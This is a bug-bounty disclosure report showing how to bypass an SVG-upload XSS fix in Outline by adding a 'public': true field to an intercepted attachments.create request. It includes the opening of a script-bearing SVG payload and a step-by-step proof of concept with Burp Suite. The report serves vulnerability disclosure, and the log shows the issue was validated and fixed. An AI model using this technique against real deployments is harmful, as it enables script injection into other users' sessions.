[Bypass] Cross-site Scriptin (XSS) via file upload in outline/outline


Reported on

Jul 17th 2022

🔒️ Requirements

Privileges: User.

📝 Description

I found a bypass to this report by uploading the file with "public": true, parameter. This is due to the fact that AWS bucket public folder does not auto download files when we access them.

🕵️‍♂️ Proof of Concept

Step 1: Go your outline home and create a new note.


Step 2: Start burp suite with proxy -> Intercept is on.


Step 3: Add in the note, the following .svg file by taping /file and [ENTER].

<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
   <script type="text/javascript">

Step 4: On burp suite, press Forward until you see:

POST /api/attachments.create HTTP/1.1
Host: esaipslack.getoutline.com
Content-Length: 111
Connection: close

    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca","contentType": "image/svg+xml",

Step 5: Add "public": true, inside the JSON.

    "public": true,
    "documentId": "b4f14bcb-d6c0-4439-8380-324c1abf00ca",
    "contentType": "image/svg+xml",
    "size": 129,
    "name": "xss.svg"

Step 6: Forward and turn Intercept to off.


Step 7: Go to your note and click to the file.

  • File


  • XSS


🔨 Fix

To fix this vulnerability, I suggest you to force download on the public part of the AWS bucket too.


An attacker could use it to get sensitive information stored in the AWS bucket.

We are processing your report and will contact the outline team within 24 hours. a year ago
We have contacted a member of the outline team and are waiting to hear back a year ago
Tom Moor validated this vulnerability a year ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor marked this as fixed in v0.65.0 with commit 9dd28d a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
a year ago

Administrative Help

to join this conversation